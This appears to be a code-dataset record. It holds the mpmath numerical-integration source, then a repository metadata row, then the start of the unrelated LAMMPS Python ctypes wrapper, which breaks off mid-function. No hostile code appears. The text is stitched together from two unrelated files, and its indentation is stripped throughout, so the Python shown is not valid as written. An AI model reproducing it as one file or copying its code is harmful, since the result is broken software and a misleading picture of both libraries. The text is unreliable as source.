D1 = self.ctx.log(abs(results[-1]-results[-2]), 10)
D2 = self.ctx.log(abs(results[-1]-results[-3]), 10)
except ValueError:
return epsilon
D3 = -prec
D4 = min(0, max(D1**2/D2, 2*D1, D3))
return self.ctx.mpf(10) ** int(D4)
def summation(self, f, points, prec, epsilon, max_degree, verbose=False):
"""
Main integration function. Computes the 1D integral over
the interval specified by *points*. For each subinterval,
performs quadrature of degree from 1 up to *max_degree*
until :func:`~mpmath.estimate_error` signals convergence.
:func:`~mpmath.summation` transforms each subintegration to
the standard interval and then calls :func:`~mpmath.sum_next`.
"""
ctx = self.ctx
I = err = ctx.zero
for i in xrange(len(points)-1):
a, b = points[i], points[i+1]
if a == b:
continue
# XXX: we could use a single variable transformation,
# but this is not good in practice. We get better accuracy
# by having 0 as an endpoint.
if (a, b) == (ctx.ninf, ctx.inf):
_f = f
f = lambda x: _f(-x) + _f(x)
a, b = (ctx.zero, ctx.inf)
results = []
for degree in xrange(1, max_degree+1):
nodes = self.get_nodes(a, b, degree, prec, verbose)
if verbose:
print("Integrating from %s to %s (degree %s of %s)" % \
(ctx.nstr(a), ctx.nstr(b), degree, max_degree))
results.append(self.sum_next(f, nodes, degree, prec, results, verbose))
if degree > 1:
err = self.estimate_error(results, prec, epsilon)
if err <= epsilon:
break
if verbose:
print("Estimated error:", ctx.nstr(err))
I += results[-1]
if err > epsilon:
if verbose:
print("Failed to reach full accuracy. Estimated error:", ctx.nstr(err))
return I, err
def sum_next(self, f, nodes, degree, prec, previous, verbose=False):
r"""
Evaluates the step sum `\sum w_k f(x_k)` where the *nodes* list
contains the `(w_k, x_k)` pairs.
:func:`~mpmath.summation` will supply the list *results* of
values computed by :func:`~mpmath.sum_next` at previous degrees, in
case the quadrature rule is able to reuse them.
"""
return self.ctx.fdot((w, f(x)) for (x,w) in nodes)
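# A hedged sketch of the custom-rule mechanism described in the
# QuadratureRule docstring: a composite midpoint rule on [-1, 1]. The class
# name and the 2**degree point count are illustrative choices, not part of
# mpmath itself.
class _MidpointRule(QuadratureRule):
    def calc_nodes(self, degree, prec, verbose=False):
        ctx = self.ctx
        n = 2**degree
        h = ctx.mpf(2)/n
        # equally weighted midpoints of n subintervals of [-1, 1]
        return [(-ctx.one + (k + ctx.mpf(0.5))*h, h) for k in xrange(n)]
# Usage sketch (low order, so only modest accuracy is reachable):
#   mp.quad(lambda x: x**2, [0, 1], method=_MidpointRule)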
class TanhSinh(QuadratureRule):
r"""
This class implements "tanh-sinh" or "doubly exponential"
quadrature. This quadrature rule is based on the Euler-Maclaurin
integral formula. By performing a change of variables involving
nested exponentials / hyperbolic functions (hence the name), the
derivatives at the endpoints vanish rapidly. Since the error term
in the Euler-Maclaurin formula depends on the derivatives at the
endpoints, a simple step sum becomes extremely accurate. In
practice, this means that doubling the number of evaluation
points roughly doubles the number of accurate digits.
Comparison to Gauss-Legendre:
* Initial computation of nodes is usually faster
* Handles endpoint singularities better
* Handles infinite integration intervals better
* Is slower for smooth integrands once nodes have been computed
The implementation of the tanh-sinh algorithm is based on the
description given in Borwein, Bailey & Girgensohn, "Experimentation
in Mathematics - Computational Paths to Discovery", A K Peters,
2003, pages 312-313. In the present implementation, a few
improvements have been made:
* A more efficient scheme is used to compute nodes (exploiting
recurrence for the exponential function)
* The nodes are computed successively instead of all at once
Various documents describing the algorithm are available online, e.g.:
* http://crd.lbl.gov/~dhbailey/dhbpapers/dhb-tanh-sinh.pdf
* http://users.cs.dal.ca/~jborwein/tanh-sinh.pdf
"""
def sum_next(self, f, nodes, degree, prec, previous, verbose=False):
"""
Step sum for tanh-sinh quadrature of degree `m`. We exploit the
fact that half of the abscissas at degree `m` are precisely the
abscissas from degree `m-1`. Thus reusing the result from
the previous level allows a 2x speedup.
"""
h = self.ctx.mpf(2)**(-degree)
# Abscissas overlap, so reusing saves half of the time
if previous:
S = previous[-1]/(h*2)
else:
S = self.ctx.zero
S += self.ctx.fdot((w,f(x)) for (x,w) in nodes)
return h*S
def calc_nodes(self, degree, prec, verbose=False):
r"""
The abscissas and weights for tanh-sinh quadrature of degree
`m` are given by
.. math::
x_k = \tanh(\pi/2 \sinh(t_k))
w_k = \pi/2 \cosh(t_k) / \cosh(\pi/2 \sinh(t_k))^2
where `t_k = t_0 + hk` for a step length `h \sim 2^{-m}`. The
list of nodes is actually infinite, but the weights die off so
rapidly that only a few are needed.
"""
ctx = self.ctx
nodes = []
extra = 20
ctx.prec += extra
tol = ctx.ldexp(1, -prec-10)
pi4 = ctx.pi/4
# For simplicity, we work in steps h = 1/2^n, with the first point
# offset so that we can reuse the sum from the previous degree
# We define degree 1 to include the "degree 0" steps, including
# the point x = 0. (It doesn't work well otherwise; not sure why.)
t0 = ctx.ldexp(1, -degree)
if degree == 1:
#nodes.append((mpf(0), pi4))
#nodes.append((-mpf(0), pi4))
nodes.append((ctx.zero, ctx.pi/2))
h = t0
else:
h = t0*2
# Since h is fixed, we can compute the next exponential
# by simply multiplying by exp(h)
expt0 = ctx.exp(t0)
a = pi4 * expt0
b = pi4 / expt0
udelta = ctx.exp(h)
urdelta = 1/udelta
for k in xrange(0, 20*2**degree+1):
# Reference implementation:
# t = t0 + k*h
# x = tanh(pi/2 * sinh(t))
# w = pi/2 * cosh(t) / cosh(pi/2 * sinh(t))**2
# Fast implementation. Note that c = exp(pi/2 * sinh(t))
c = ctx.exp(a-b)
d = 1/c
co = (c+d)/2
si = (c-d)/2
x = si / co
w = (a+b) / co**2
diff = abs(x-1)
if diff <= tol:
break
nodes.append((x, w))
nodes.append((-x, w))
a *= udelta
b *= urdelta
if verbose and k % 300 == 150:
# Note: the number displayed is rather arbitrary. Should
# figure out how to print something that looks more like a
# percentage
print("Calculating nodes:", ctx.nstr(-ctx.log(diff, 10) / prec))
ctx.prec -= extra
return nodes
class GaussLegendre(QuadratureRule):
"""
This class implements Gauss-Legendre quadrature, which is
exceptionally efficient for polynomials and polynomial-like (i.e.
very smooth) integrands.
The abscissas and weights are given by roots and values of
Legendre polynomials, which are the orthogonal polynomials
on `[-1, 1]` with respect to the unit weight
(see :func:`~mpmath.legendre`).
In this implementation, we take the "degree" `m` of the quadrature
to denote a Gauss-Legendre rule of degree `3 \cdot 2^m` (following
Borwein, Bailey & Girgensohn). This way we get quadratic, rather
than linear, convergence as the degree is incremented.
Comparison to tanh-sinh quadrature:
* Is faster for smooth integrands once nodes have been computed
* Initial computation of nodes is usually slower
* Handles endpoint singularities worse
* Handles infinite integration intervals worse
"""
def calc_nodes(self, degree, prec, verbose=False):
"""
Calculates the abscissas and weights for Gauss-Legendre
quadrature of degree of given degree (actually `3 \cdot 2^m`).
"""
ctx = self.ctx
# It is important that the epsilon is set lower than the
# "real" epsilon
epsilon = ctx.ldexp(1, -prec-8)
# Fairly high precision might be required for accurate
# evaluation of the roots
orig = ctx.prec
ctx.prec = int(prec*1.5)
if degree == 1:
x = ctx.mpf(3)/5
w = ctx.mpf(5)/9
nodes = [(-x,w),(ctx.zero,ctx.mpf(8)/9),(x,w)]
ctx.prec = orig
return nodes
nodes = []
n = 3*2**(degree-1)
upto = n//2 + 1
for j in xrange(1, upto):
# Asymptotic formula for the roots
r = ctx.mpf(math.cos(math.pi*(j-0.25)/(n+0.5)))
# Newton iteration
while 1:
t1, t2 = 1, 0
# Evaluates the Legendre polynomial using its defining
# recurrence relation
for j1 in xrange(1,n+1):
t3, t2, t1 = t2, t1, ((2*j1-1)*r*t1 - (j1-1)*t2)/j1
t4 = n*(r*t1- t2)/(r**2-1)
t5 = r
a = t1/t4
r = r - a
if abs(a) < epsilon:
break
x = r
w = 2/((1-r**2)*t4**2)
if verbose and j % 30 == 15:
print("Computing nodes (%i of %i)" % (j, upto))
nodes.append((x, w))
nodes.append((-x, w))
ctx.prec = orig
return nodes
class QuadratureMethods:
def __init__(ctx, *args, **kwargs):
ctx._gauss_legendre = GaussLegendre(ctx)
ctx._tanh_sinh = TanhSinh(ctx)
def quad(ctx, f, *points, **kwargs):
r"""
Computes a single, double or triple integral over a given
1D interval, 2D rectangle, or 3D cuboid. A basic example::
>>> from mpmath import *
>>> mp.dps = 15; mp.pretty = True
>>> quad(sin, [0, pi])
2.0
A basic 2D integral::
>>> f = lambda x, y: cos(x+y/2)
>>> quad(f, [-pi/2, pi/2], [0, pi])
4.0
**Interval format**
The integration range for each dimension may be specified
using a list or tuple. Arguments are interpreted as follows:
``quad(f, [x1, x2])`` -- calculates
`\int_{x_1}^{x_2} f(x) \, dx`
``quad(f, [x1, x2], [y1, y2])`` -- calculates
`\int_{x_1}^{x_2} \int_{y_1}^{y_2} f(x,y) \, dy \, dx`
``quad(f, [x1, x2], [y1, y2], [z1, z2])`` -- calculates
`\int_{x_1}^{x_2} \int_{y_1}^{y_2} \int_{z_1}^{z_2} f(x,y,z)
\, dz \, dy \, dx`
Endpoints may be finite or infinite. An interval descriptor
may also contain more than two points. In this
case, the integration is split into subintervals, between
each pair of consecutive points. This is useful for
dealing with mid-interval discontinuities, or integrating
over large intervals where the function is irregular or
oscillates.
**Options**
:func:`~mpmath.quad` recognizes the following keyword arguments:
*method*
Chooses integration algorithm (described below).
*error*
If set to true, :func:`~mpmath.quad` returns `(v, e)` where `v` is the
integral and `e` is the estimated error.
*maxdegree*
Maximum degree of the quadrature rule to try before
quitting.
*verbose*
Print details about progress.
**Algorithms**
Mpmath presently implements two integration algorithms: tanh-sinh
quadrature and Gauss-Legendre quadrature. These can be selected
using *method='tanh-sinh'* or *method='gauss-legendre'* or by
passing the classes *method=TanhSinh*, *method=GaussLegendre*.
The functions :func:`~mpmath.quadts` and :func:`~mpmath.quadgl` are also available
as shortcuts.
Both algorithms have the property that doubling the number of
evaluation points roughly doubles the accuracy, so both are ideal
for high precision quadrature (hundreds or thousands of digits).
At high precision, computing the nodes and weights for the
integration can be expensive (more expensive than computing the
function values). To make repeated integrations fast, nodes
are automatically cached.
The advantages of the tanh-sinh algorithm are that it tends to
handle endpoint singularities well, and that the nodes are cheap
to compute on the first run. For these reasons, it is used by
:func:`~mpmath.quad` as the default algorithm.
Gauss-Legendre quadrature often requires fewer function
evaluations, and is therefore often faster for repeated use, but
the algorithm does not handle endpoint singularities as well and
the nodes are more expensive to compute. Gauss-Legendre quadrature
can be a better choice if the integrand is smooth and repeated
integrations are required (e.g. for multiple integrals).
See the documentation for :class:`TanhSinh` and
:class:`GaussLegendre` for additional details.
**Examples of 1D integrals**
Intervals may be infinite or half-infinite. The following two
examples evaluate the limits of the inverse tangent function
(`\int 1/(1+x^2) = \tan^{-1} x`), and the Gaussian integral
        `\int_{-\infty}^{\infty} \exp(-x^2)\,dx = \sqrt{\pi}`::
>>> mp.dps = 15
>>> quad(lambda x: 2/(x**2+1), [0, inf])
3.14159265358979
>>> quad(lambda x: exp(-x**2), [-inf, inf])**2
3.14159265358979
Integrals can typically be resolved to high precision.
The following computes 50 digits of `\pi` by integrating the
area of the half-circle defined by `x^2 + y^2 \le 1`,
`-1 \le x \le 1`, `y \ge 0`::
>>> mp.dps = 50
>>> 2*quad(lambda x: sqrt(1-x**2), [-1, 1])
3.1415926535897932384626433832795028841971693993751
One can just as well compute 1000 digits (output truncated)::
>>> mp.dps = 1000
>>> 2*quad(lambda x: sqrt(1-x**2), [-1, 1]) #doctest:+ELLIPSIS
3.141592653589793238462643383279502884...216420198
Complex integrals are supported. The following computes
a residue at `z = 0` by integrating counterclockwise along the
diamond-shaped path from `1` to `+i` to `-1` to `-i` to `1`::
>>> mp.dps = 15
>>> chop(quad(lambda z: 1/z, [1,j,-1,-j,1]))
(0.0 + 6.28318530717959j)
**Examples of 2D and 3D integrals**
Here are several nice examples of analytically solvable
2D integrals (taken from MathWorld [1]) that can be evaluated
to high precision fairly rapidly by :func:`~mpmath.quad`::
>>> mp.dps = 30
>>> f = lambda x, y: (x-1)/((1-x*y)*log(x*y))
>>> quad(f, [0, 1], [0, 1])
0.577215664901532860606512090082
>>> +euler
0.577215664901532860606512090082
>>> f = lambda x, y: 1/sqrt(1+x**2+y**2)
>>> quad(f, [-1, 1], [-1, 1])
3.17343648530607134219175646705
>>> 4*log(2+sqrt(3))-2*pi/3
3.17343648530607134219175646705
>>> f = lambda x, y: 1/(1-x**2 * y**2)
>>> quad(f, [0, 1], [0, 1])
1.23370055013616982735431137498
>>> pi**2 / 8
1.23370055013616982735431137498
>>> quad(lambda x, y: 1/(1-x*y), [0, 1], [0, 1])
1.64493406684822643647241516665
>>> pi**2 / 6
1.64493406684822643647241516665
Multiple integrals may be done over infinite ranges::
>>> mp.dps = 15
>>> print(quad(lambda x,y: exp(-x-y), [0, inf], [1, inf]))
0.367879441171442
>>> print(1/e)
0.367879441171442
For nonrectangular areas, one can call :func:`~mpmath.quad` recursively.
        For example, we can replicate the earlier example of calculating
        `\pi` by integrating over the unit circle, this time using double
        quadrature to measure the area of the circle directly::
>>> f = lambda x: quad(lambda y: 1, [-sqrt(1-x**2), sqrt(1-x**2)])
>>> quad(f, [-1, 1])
3.14159265358979
Here is a simple triple integral::
>>> mp.dps = 15
>>> f = lambda x,y,z: x*y/(1+z)
>>> quad(f, [0,1], [0,1], [1,2], method='gauss-legendre')
0.101366277027041
>>> (log(3)-log(2))/4
0.101366277027041
**Singularities**
Both tanh-sinh and Gauss-Legendre quadrature are designed to
integrate smooth (infinitely differentiable) functions. Neither
algorithm copes well with mid-interval singularities (such as
mid-interval discontinuities in `f(x)` or `f'(x)`).
The best solution is to split the integral into parts::
>>> mp.dps = 15
>>> quad(lambda x: abs(sin(x)), [0, 2*pi]) # Bad
3.99900894176779
>>> quad(lambda x: abs(sin(x)), [0, pi, 2*pi]) # Good
4.0
The tanh-sinh rule often works well for integrands having a
singularity at one or both endpoints::
>>> mp.dps = 15
>>> quad(log, [0, 1], method='tanh-sinh') # Good
-1.0
>>> quad(log, [0, 1], method='gauss-legendre') # Bad
-0.999932197413801
However, the result may still be inaccurate for some functions::
>>> quad(lambda x: 1/sqrt(x), [0, 1], method='tanh-sinh')
1.99999999946942
This problem is not due to the quadrature rule per se, but to
numerical amplification of errors in the nodes. The problem can be
circumvented by temporarily increasing the precision::
>>> mp.dps = 30
>>> a = quad(lambda x: 1/sqrt(x), [0, 1], method='tanh-sinh')
>>> mp.dps = 15
>>> +a
2.0
**Highly variable functions**
For functions that are smooth (in the sense of being infinitely
differentiable) but contain sharp mid-interval peaks or many
"bumps", :func:`~mpmath.quad` may fail to provide full accuracy. For
example, with default settings, :func:`~mpmath.quad` is able to integrate
`\sin(x)` accurately over an interval of length 100 but not over
length 1000::
>>> quad(sin, [0, 100]); 1-cos(100) # Good
0.137681127712316
0.137681127712316
>>> quad(sin, [0, 1000]); 1-cos(1000) # Bad
-37.8587612408485
0.437620923709297
One solution is to break the integration into 10 intervals of
length 100::
>>> quad(sin, linspace(0, 1000, 10)) # Good
0.437620923709297
Another is to increase the degree of the quadrature::
>>> quad(sin, [0, 1000], maxdegree=10) # Also good
0.437620923709297
Whether splitting the interval or increasing the degree is
more efficient differs from case to case. Another example is the
function `1/(1+x^2)`, which has a sharp peak centered around
`x = 0`::
>>> f = lambda x: 1/(1+x**2)
>>> quad(f, [-100, 100]) # Bad
3.64804647105268
>>> quad(f, [-100, 100], maxdegree=10) # Good
3.12159332021646
>>> quad(f, [-100, 0, 100]) # Also good
3.12159332021646
**References**
1. http://mathworld.wolfram.com/DoubleIntegral.html
"""
rule = kwargs.get('method', 'tanh-sinh')
if type(rule) is str:
if rule == 'tanh-sinh':
rule = ctx._tanh_sinh
elif rule == 'gauss-legendre':
rule = ctx._gauss_legendre
else:
raise ValueError("unknown quadrature rule: %s" % rule)
else:
rule = rule(ctx)
verbose = kwargs.get('verbose')
dim = len(points)
orig = prec = ctx.prec
epsilon = ctx.eps/8
m = kwargs.get('maxdegree') or rule.guess_degree(prec)
points = [ctx._as_points(p) for p in points]
try:
ctx.prec += 20
if dim == 1:
v, err = rule.summation(f, points[0], prec, epsilon, m, verbose)
elif dim == 2:
v, err = rule.summation(lambda x: \
rule.summation(lambda y: f(x,y), \
points[1], prec, epsilon, m)[0],
points[0], prec, epsilon, m, verbose)
elif dim == 3:
v, err = rule.summation(lambda x: \
rule.summation(lambda y: \
rule.summation(lambda z: f(x,y,z), \
points[2], prec, epsilon, m)[0],
points[1], prec, epsilon, m)[0],
points[0], prec, epsilon, m, verbose)
else:
raise NotImplementedError("quadrature must have dim 1, 2 or 3")
finally:
ctx.prec = orig
if kwargs.get("error"):
return +v, err
return +v
def quadts(ctx, *args, **kwargs):
"""
Performs tanh-sinh quadrature. The call
quadts(func, *points, ...)
is simply a shortcut for:
quad(func, *points, ..., method=TanhSinh)
For example, a single integral and a double integral:
quadts(lambda x: exp(cos(x)), [0, 1])
quadts(lambda x, y: exp(cos(x+y)), [0, 1], [0, 1])
See the documentation for quad for information about how points
arguments and keyword arguments are parsed.
See documentation for TanhSinh for algorithmic information about
tanh-sinh quadrature.
"""
kwargs['method'] = 'tanh-sinh'
return ctx.quad(*args, **kwargs)
def quadgl(ctx, *args, **kwargs):
"""
Performs Gauss-Legendre quadrature. The call
quadgl(func, *points, ...)
is simply a shortcut for:
quad(func, *points, ..., method=GaussLegendre)
For example, a single integral and a double integral:
quadgl(lambda x: exp(cos(x)), [0, 1])
quadgl(lambda x, y: exp(cos(x+y)), [0, 1], [0, 1])
See the documentation for quad for information about how points
arguments and keyword arguments are parsed.
See documentation for TanhSinh for algorithmic information about
tanh-sinh quadrature.
"""
kwargs['method'] = 'gauss-legendre'
return ctx.quad(*args, **kwargs)
def quadosc(ctx, f, interval, omega=None, period=None, zeros=None):
r"""
Calculates
.. math ::
I = \int_a^b f(x) dx
where at least one of `a` and `b` is infinite and where
`f(x) = g(x) \cos(\omega x + \phi)` for some slowly
decreasing function `g(x)`. With proper input, :func:`~mpmath.quadosc`
can also handle oscillatory integrals where the oscillation
rate is different from a pure sine or cosine wave.
In the standard case when `|a| < \infty, b = \infty`,
:func:`~mpmath.quadosc` works by evaluating the infinite series
.. math ::
I = \int_a^{x_1} f(x) dx +
\sum_{k=1}^{\infty} \int_{x_k}^{x_{k+1}} f(x) dx
where `x_k` are consecutive zeros (alternatively
some other periodic reference point) of `f(x)`.
Accordingly, :func:`~mpmath.quadosc` requires information about the
zeros of `f(x)`. For a periodic function, you can specify
the zeros by either providing the angular frequency `\omega`
(*omega*) or the *period* `2 \pi/\omega`. In general, you can
specify the `n`-th zero by providing the *zeros* arguments.
Below is an example of each::
>>> from mpmath import *
>>> mp.dps = 15; mp.pretty = True
>>> f = lambda x: sin(3*x)/(x**2+1)
>>> quadosc(f, [0,inf], omega=3)
0.37833007080198
>>> quadosc(f, [0,inf], period=2*pi/3)
0.37833007080198
>>> quadosc(f, [0,inf], zeros=lambda n: pi*n/3)
0.37833007080198
>>> (ei(3)*exp(-3)-exp(3)*ei(-3))/2 # Computed by Mathematica
0.37833007080198
Note that *zeros* was specified to multiply `n` by the
*half-period*, not the full period. In theory, it does not matter
whether each partial integral is done over a half period or a full
period. However, if done over half-periods, the infinite series
passed to :func:`~mpmath.nsum` becomes an *alternating series* and this
typically makes the extrapolation much more efficient.
Here is an example of an integration over the entire real line,
and a half-infinite integration starting at `-\infty`::
>>> quadosc(lambda x: cos(x)/(1+x**2), [-inf, inf], omega=1)
1.15572734979092
>>> pi/e
1.15572734979092
>>> quadosc(lambda x: cos(x)/x**2, [-inf, -1], period=2*pi)
-0.0844109505595739
>>> cos(1)+si(1)-pi/2
-0.0844109505595738
Of course, the integrand may contain a complex exponential just as
well as a real sine or cosine::
>>> quadosc(lambda x: exp(3*j*x)/(1+x**2), [-inf,inf], omega=3)
(0.156410688228254 + 0.0j)
>>> pi/e**3
0.156410688228254
>>> quadosc(lambda x: exp(3*j*x)/(2+x+x**2), [-inf,inf], omega=3)
(0.00317486988463794 - 0.0447701735209082j)
>>> 2*pi/sqrt(7)/exp(3*(j+sqrt(7))/2)
(0.00317486988463794 - 0.0447701735209082j)
**Non-periodic functions**
If `f(x) = g(x) h(x)` for some function `h(x)` that is not
strictly periodic, *omega* or *period* might not work, and it might
be necessary to use *zeros*.
A notable exception can be made for Bessel functions which, though not
periodic, are "asymptotically periodic" in a sufficiently strong sense
that the sum extrapolation will work out::
>>> quadosc(j0, [0, inf], period=2*pi)
1.0
>>> quadosc(j1, [0, inf], period=2*pi)
1.0
More properly, one should provide the exact Bessel function zeros::
>>> j0zero = lambda n: findroot(j0, pi*(n-0.25))
>>> quadosc(j0, [0, inf], zeros=j0zero)
1.0
For an example where *zeros* becomes necessary, consider the
complete Fresnel integrals
.. math ::
\int_0^{\infty} \cos x^2\,dx = \int_0^{\infty} \sin x^2\,dx
= \sqrt{\frac{\pi}{8}}.
Although the integrands do not decrease in magnitude as
`x \to \infty`, the integrals are convergent since the oscillation
rate increases (causing consecutive periods to asymptotically
cancel out). These integrals are virtually impossible to calculate
to any kind of accuracy using standard quadrature rules. However,
if one provides the correct asymptotic distribution of zeros
(`x_n \sim \sqrt{n}`), :func:`~mpmath.quadosc` works::
>>> mp.dps = 30
>>> f = lambda x: cos(x**2)
>>> quadosc(f, [0,inf], zeros=lambda n:sqrt(pi*n))
0.626657068657750125603941321203
>>> f = lambda x: sin(x**2)
>>> quadosc(f, [0,inf], zeros=lambda n:sqrt(pi*n))
0.626657068657750125603941321203
>>> sqrt(pi/8)
0.626657068657750125603941321203
(Interestingly, these integrals can still be evaluated if one
places some other constant than `\pi` in the square root sign.)
In general, if `f(x) \sim g(x) \cos(h(x))`, the zeros follow
the inverse-function distribution `h^{-1}(x)`::
>>> mp.dps = 15
>>> f = lambda x: sin(exp(x))
>>> quadosc(f, [1,inf], zeros=lambda n: log(n))
-0.25024394235267
>>> pi/2-si(e)
-0.250243942352671
**Non-alternating functions**
If the integrand oscillates around a positive value, without
alternating signs, the extrapolation might fail. A simple trick
that sometimes works is to multiply or divide the frequency by 2::
>>> f = lambda x: 1/x**2+sin(x)/x**4
>>> quadosc(f, [1,inf], omega=1) # Bad
1.28642190869861
>>> quadosc(f, [1,inf], omega=0.5) # Perfect
1.28652953559617
>>> 1+(cos(1)+ci(1)+sin(1))/6
1.28652953559617
**Fast decay**
:func:`~mpmath.quadosc` is primarily useful for slowly decaying
integrands. If the integrand decreases exponentially or faster,
:func:`~mpmath.quad` will likely handle it without trouble (and generally be
much faster than :func:`~mpmath.quadosc`)::
>>> quadosc(lambda x: cos(x)/exp(x), [0, inf], omega=1)
0.5
>>> quad(lambda x: cos(x)/exp(x), [0, inf])
0.5
"""
a, b = ctx._as_points(interval)
a = ctx.convert(a)
b = ctx.convert(b)
if [omega, period, zeros].count(None) != 2:
raise ValueError( \
"must specify exactly one of omega, period, zeros")
if a == ctx.ninf and b == ctx.inf:
s1 = ctx.quadosc(f, [a, 0], omega=omega, zeros=zeros, period=period)
s2 = ctx.quadosc(f, [0, b], omega=omega, zeros=zeros, period=period)
return s1 + s2
if a == ctx.ninf:
if zeros:
                return ctx.quadosc(lambda x:f(-x), [-b,-a], zeros=lambda n: zeros(-n))
else:
return ctx.quadosc(lambda x:f(-x), [-b,-a], omega=omega, period=period)
if b != ctx.inf:
raise ValueError("quadosc requires an infinite integration interval")
if not zeros:
if omega:
period = 2*ctx.pi/omega
zeros = lambda n: n*period/2
#for n in range(1,10):
# p = zeros(n)
# if p > a:
# break
#if n >= 9:
# raise ValueError("zeros do not appear to be correctly indexed")
n = 1
s = ctx.quadgl(f, [a, zeros(n)])
def term(k):
return ctx.quadgl(f, [zeros(k), zeros(k+1)])
s += ctx.nsum(term, [n, ctx.inf])
return s
if __name__ == '__main__':
import doctest
doctest.testmod()
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/sympy/mpmath/calculus/quadrature.py
|
Python
|
agpl-3.0
| 38,274
|
[
"Gaussian"
] |
a29a71567feb375ef20d04ec3fabb076bba1d1223e1712ebc9f7ba9c7bf67df5
|
# ----------------------------------------------------------------------
# LAMMPS - Large-scale Atomic/Molecular Massively Parallel Simulator
# http://lammps.sandia.gov, Sandia National Laboratories
# Steve Plimpton, sjplimp@sandia.gov
#
# Copyright (2003) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
#
# See the README file in the top-level LAMMPS directory.
# -------------------------------------------------------------------------
# Python wrappers on LAMMPS library via ctypes
# for python3 compatibility
from __future__ import print_function
# imports for simple LAMMPS python wrapper module "lammps"
import sys,traceback,types
from ctypes import *
from os.path import dirname,abspath,join
from inspect import getsourcefile
# imports for advanced LAMMPS python wrapper modules "PyLammps" and "IPyLammps"
from collections import namedtuple
import os
import select
import re
def get_ctypes_int(size):
if size == 4:
return c_int32
elif size == 8:
return c_int64
return c_int
class MPIAbortException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class lammps(object):
# detect if Python is using version of mpi4py that can pass a communicator
has_mpi4py = False
try:
from mpi4py import MPI
from mpi4py import __version__ as mpi4py_version
if mpi4py_version.split('.')[0] in ['2','3']: has_mpi4py = True
except:
pass
# create instance of LAMMPS
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
self.comm = comm
self.opened = 0
# determine module location
modpath = dirname(abspath(getsourcefile(lambda:0)))
self.lib = None
# if a pointer to a LAMMPS object is handed in,
# all symbols should already be available
try:
if ptr: self.lib = CDLL("",RTLD_GLOBAL)
except:
self.lib = None
# load liblammps.so unless name is given
# if name = "g++", load liblammps_g++.so
# try loading the LAMMPS shared object from the location
# of lammps.py with an absolute path,
# so that LD_LIBRARY_PATH does not need to be set for regular install
# fall back to loading with a relative path,
# typically requires LD_LIBRARY_PATH to be set appropriately
if not self.lib:
try:
if not name: self.lib = CDLL(join(modpath,"liblammps.so"),RTLD_GLOBAL)
else: self.lib = CDLL(join(modpath,"liblammps_%s.so" % name),
RTLD_GLOBAL)
except:
if not name: self.lib = CDLL("liblammps.so",RTLD_GLOBAL)
else: self.lib = CDLL("liblammps_%s.so" % name,RTLD_GLOBAL)
# define ctypes API for each library method
# NOTE: should add one of these for each lib function
self.lib.lammps_extract_box.argtypes = \
[c_void_p,POINTER(c_double),POINTER(c_double),
POINTER(c_double),POINTER(c_double),POINTER(c_double),
POINTER(c_int),POINTER(c_int)]
self.lib.lammps_extract_box.restype = None
self.lib.lammps_reset_box.argtypes = \
[c_void_p,POINTER(c_double),POINTER(c_double),c_double,c_double,c_double]
self.lib.lammps_reset_box.restype = None
self.lib.lammps_gather_atoms.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_void_p]
self.lib.lammps_gather_atoms.restype = None
self.lib.lammps_gather_atoms_concat.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_void_p]
self.lib.lammps_gather_atoms_concat.restype = None
self.lib.lammps_gather_atoms_subset.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_int,POINTER(c_int),c_void_p]
self.lib.lammps_gather_atoms_subset.restype = None
self.lib.lammps_scatter_atoms.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_void_p]
self.lib.lammps_scatter_atoms.restype = None
self.lib.lammps_scatter_atoms_subset.argtypes = \
[c_void_p,c_char_p,c_int,c_int,c_int,POINTER(c_int),c_void_p]
self.lib.lammps_scatter_atoms_subset.restype = None
# if no ptr provided, create an instance of LAMMPS
# don't know how to pass an MPI communicator from PyPar
# but we can pass an MPI communicator from mpi4py v2.0.0 and later
# no_mpi call lets LAMMPS use MPI_COMM_WORLD
# cargs = array of C strings from args
# if ptr, then are embedding Python in LAMMPS input script
# ptr is the desired instance of LAMMPS
# just convert it to ctypes ptr and store in self.lmp
if not ptr:
# with mpi4py v2, can pass MPI communicator to LAMMPS
# need to adjust for type of MPI communicator object
# allow for int (like MPICH) or void* (like OpenMPI)
if comm:
if not lammps.has_mpi4py:
raise Exception('Python mpi4py version is not 2 or 3')
if lammps.MPI._sizeof(lammps.MPI.Comm) == sizeof(c_int):
MPI_Comm = c_int
else:
MPI_Comm = c_void_p
narg = 0
cargs = 0
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
          self.lib.lammps_open.argtypes = [c_int, c_char_p*narg, \
                                           MPI_Comm, POINTER(c_void_p)]
else:
          self.lib.lammps_open.argtypes = [c_int, c_int, \
                                           MPI_Comm, POINTER(c_void_p)]
self.lib.lammps_open.restype = None
self.opened = 1
self.lmp = c_void_p()
comm_ptr = lammps.MPI._addressof(comm)
comm_val = MPI_Comm.from_address(comm_ptr)
self.lib.lammps_open(narg,cargs,comm_val,byref(self.lmp))
else:
self.opened = 1
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(narg,cargs,byref(self.lmp))
else:
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(0,None,byref(self.lmp))
# could use just this if LAMMPS lib interface supported it
# self.lmp = self.lib.lammps_open_no_mpi(0,None)
else:
# magic to convert ptr to ctypes ptr
if sys.version_info >= (3, 0):
# Python 3 (uses PyCapsule API)
pythonapi.PyCapsule_GetPointer.restype = c_void_p
pythonapi.PyCapsule_GetPointer.argtypes = [py_object, c_char_p]
self.lmp = c_void_p(pythonapi.PyCapsule_GetPointer(ptr, None))
else:
# Python 2 (uses PyCObject API)
pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
